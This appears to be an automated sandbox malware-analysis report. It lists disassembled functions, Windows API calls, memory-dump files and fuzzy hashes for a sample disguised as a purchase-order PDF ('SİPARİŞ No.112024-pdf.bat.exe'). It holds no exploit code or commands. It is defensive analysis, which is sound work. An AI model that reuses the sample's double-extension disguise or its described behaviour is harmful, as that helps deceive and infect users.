                                                                  • Instruction ID: b981dfd93ec331c3b9a34c40441268954a5fd10c61cb517d904db4ec9094c3f9
                                                                  • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                  • Instruction Fuzzy Hash: DFE08C326042116BD7159B70AE4487B63AC9A89650307883EFD4AF2181EB39EC31A66D
                                                                  Function 00405D7A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                  Function 00405838 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,0040334C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040583E
                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040584C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                  • Instruction ID: bbf35a5bb38483cb45838bf81b7f1c8f5060ebeb43bc13b88216483053fd9792
                                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                  • Instruction Fuzzy Hash: 39C04C713156019ADB506F219F08B1B7A54AB60741F15843DA946E10E0DF348465ED2E
                                                                  Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 327478801-0
                                                                  • Opcode ID: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                                                  • Instruction ID: bb989e29a52a93802ac21e82b74e9b17d97bb9506e6cfc7636de57e0f2ab50b5
                                                                  • Opcode Fuzzy Hash: 95ba7574d33027012252503f20e6de7da786a665e35f302a49c950640621c3c4
                                                                  • Instruction Fuzzy Hash: B8E09271E14104AFD710DBA5AE0ACBEB7B8DB84318B20403BF201F50D1CA794E118E3E
                                                                  Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                  • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                  • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                  • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                  Function 0040611F Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                  • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                  • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                                  Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                  • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                  • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                                  Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                  • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                  • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                                  Function 6FBC2997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(6FBC405C,00000004,00000040,6FBC404C), ref: 6FBC29B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2314732949.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2313796195.000000006FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314786936.000000006FBC3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2314896554.000000006FBC5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6fbc0000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: a9a07f4fad6d4ac63cd121176d9e2b3ba1f662b66208a4d2761b948c41563378
                                                                  • Instruction ID: 1566f7b81081c6dbb248daf258cd4eb0617e8a8fc4bce13e0bd4d7959dcb6f54
                                                                  • Opcode Fuzzy Hash: a9a07f4fad6d4ac63cd121176d9e2b3ba1f662b66208a4d2761b948c41563378
                                                                  • Instruction Fuzzy Hash: 89F0A5B1588A80DFCB50CF6A94447073BF0F74E324B0349AAE1A9D7240E3744266DB1A
                                                                  Function 004060F1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                  • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                  • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                                  Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                  • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                                  • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                                  • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                                  Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                  Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                  • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                                  • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                                  • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                                  Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2269131810.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2269085291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269177166.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269199859.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2269376545.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                  • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                                  • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                                  • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

                                                                  Non-executed Functions

                                                                  Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                                  • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                                  • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
